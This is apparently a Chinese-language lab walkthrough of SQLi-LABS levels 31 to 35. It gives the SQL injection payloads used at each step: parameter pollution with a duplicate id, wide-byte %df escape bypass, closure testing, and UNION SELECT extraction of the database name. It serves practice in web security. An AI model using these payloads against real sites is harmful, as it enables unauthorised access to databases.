SQLi-LABS 31关
1.通过查看源码,得知31关是重复参数漏洞注入,就是需要两个参数,而第一个参数被过滤掉了,所以我们在第二个参数进行sql注入。
2.判断闭合方式
?id=1$&id=2' //显示正常
?id=1$&id=2" //显示错误,尝试闭合
?id=1$&id=2"--+ //显示依旧错误
?id=1$&id=2")--+ //显示正常
所以是")--+闭合方式
3.使用联合查询
测试回显点
?id=1$&id=-2") union select 1,2,3--+
4.使用联合查询爆数据库名
?id=1$&id=-2") union select 1,database(),3--+
SQLi-LABS 32关
1.本关卡考的是宽字节注入
宽字节注入就是输入的单引号被 \ 转义了,需要使用另一个字符和转义符组合成一个字符,这样就可就将转义绕过了。
2.测试闭合方式
?id=1' //显示单引号被转义了
?id=1%df' //单引号恢复正常
?id=1%df' //显示错误 ,进一步测试闭合
?id=1%df'--+ //回显正常,闭合成功
3.测试回显点
?id=-1%df%27%20union%20select%201,2,3--+
4.使用联合查询爆数据库名
?id=-1%df%27%20union%20select%201,database(),3--+
SQLi-LABS 33关
1.本关和上一关一样,都是宽字节注入
2.测试闭合
?id=1' //显示单引号被转义了
?id=1%df' //单引号恢复正常
?id=1%df' //显示错误 ,进一步测试闭合
?id=1%df'--+ //回显正常,闭合成功
3.测试回显点
?id=-1%df%27%20union%20select%201,2,3--+
4.联合查询爆数据库名
?id=-1%df%27%20union%20select%201,database(),3--+
SQLi-LABS 34关
该关是post方式和宽字节注入
因为是post方式,所以我们进行抓包,在重放器中进行注入测试,接下来和33一样进行就可以。
SQLi-LABS 35关
1.本关是常规解法,测试闭合
?id=1' //显示单引号被转义了
?id=1%df' //显示错误
?id=1%df' --+ //显示错误
?id=1--+ //回显正确
所以直接只用数字型的注入
2.测试回显点
?id=-1 union select 1,2,3--+
3.使用联查询爆数据库名
?id=-1 union select 1,database(),3--+